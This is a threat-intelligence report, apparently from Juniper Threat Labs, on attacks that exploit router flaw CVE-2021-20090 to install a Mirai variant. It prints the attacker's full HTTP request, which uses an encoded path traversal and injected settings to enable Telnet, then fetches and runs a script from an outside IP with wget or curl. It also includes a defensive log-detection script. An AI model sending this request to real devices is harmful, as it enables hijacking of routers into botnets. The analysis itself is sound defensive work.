Juniper Threat Labs discovered active exploitation of a vulnerability that was disclosed just a few days ago.

CVE-2021-20090 is a vulnerability that was discovered by Tenable and made public on August 3, 2021. 

This vulnerability potentially affects millions of home routers manufactured by no less than 17 vendors according to Tenable research, including some ISPs. The common thread between these devices seems to be firmware from Arcadyan. 

CVE-2021-20090 is a path traversal vulnerability that leads to an authentication bypass. When exploited, the attacker can take over control of the affected device.

As of August 5, Juniper Threat Labs identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China. The attacker seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar in name to the ones mentioned by Palo Alto Networks in March.

The research team had witnessed the same activity starting February 18. The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability. Given that most people may not even be aware of the security risk and won’t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out. 

Starting June 6, 2021, and through July 23, Juniper Threat Labs has noticed this threat actor starting to exploit other vulnerabilities:

  1. CVE-2020-29557 (D-Link routers)
  2. CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)
  3. CVE-2021-31755 (Tenda AC11)
  4. CVE-2021-22502 (MicroFocus OBR)
  5. CVE-2021-22506 (MicroFocus AM)
  6. a couple more exploits from exploit-db with no related CVEs.

The latest exploited vulnerability, CVE-2021-20090, is probably not the last one to be added.

Attack Details 

The initial attack originated from the IP address 27.22.80[.]19 over HTTP with the following POST method: 

POST /images/..%2fapply_abstract.cgi HTTP/1.1  
Connection: close  
User-Agent: Dark  

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;
wget+http://212.192.241.72/lolol.sh;
curl+-O+http://212.192.241.72/lolol.sh;
chmod+777+lolol.sh;
sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4 

As this POST request shows, the attacker modifies the configuration of the attacked device to enable Telnet using “ARC_SYS_TelnetdEnable=1”, then downloads a new script from the IP address 212.192.241[.]72 using either wget or curl and executes it.
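The traits of this request can be turned into a check for web or proxy logs that record the request target and body. The following is an added example, not code from Juniper Threat Labs; it also normalises nested percent-encoding, which goes beyond the single request shown. The rule names, the `inspect_request` helper and the sample values (192.0.2.10, sample.sh) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

DOTDOT = re.compile(r"(^|/)\.\.(/|$)")  # a ".." path segment

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly (bounded) so nested encodings are normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_request(target, body=""):
    """Return the names of the rules (this example's own) that one request matches."""
    hits = []
    raw_path = urlsplit(target).path
    # Rule 1: ".." segment that is visible only after decoding, e.g. /images/..%2f
    if DOTDOT.search(fully_decode(raw_path)):
        hits.append("traversal" if DOTDOT.search(raw_path) else "encoded_traversal")
    # Rule 2: encoded CR/LF inside a form body, used to append extra settings
    if re.search(r"%0[ad]", body, re.I):
        hits.append("newline_in_form_value")
    form = unquote_plus(body)
    # Rule 3: the Telnet setting named in the article
    if re.search(r"ARC_SYS_TelnetdEnable\s*=\s*1", form):
        hits.append("telnetd_enable")
    # Rule 4: a wget/curl fetch followed by running a script with sh
    if re.search(r"\b(?:wget|curl)\b[^&]*;\s*sh\s+\S+", form):
        hits.append("download_and_execute")
    return hits

# Constructed sample modelled on the request above; 192.0.2.10 and sample.sh
# are placeholders, not values from the article.
SAMPLE_BODY = (
    "action=start_ping&submit_button=ping.html"
    "&ARC_ping_ipaddress=192.0.2.10%0AARC_SYS_TelnetdEnable=1"
    "&%0AARC_SYS_=cd+/tmp;wget+http://192.0.2.10/sample.sh;"
    "sh+sample.sh&ARC_ping_status=0"
)

if __name__ == "__main__":
    for target, body in [("/images/..%2fapply_abstract.cgi", SAMPLE_BODY),
                         ("/images/logo.png", "")]:
        print(target, inspect_request(target, body))
```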

Juniper Threat Labs obtained a copy of the payload and confirmed it is a Mirai botnet variant. It was interesting to note that this botnet removes previous Mirai infections to clean the slate for itself.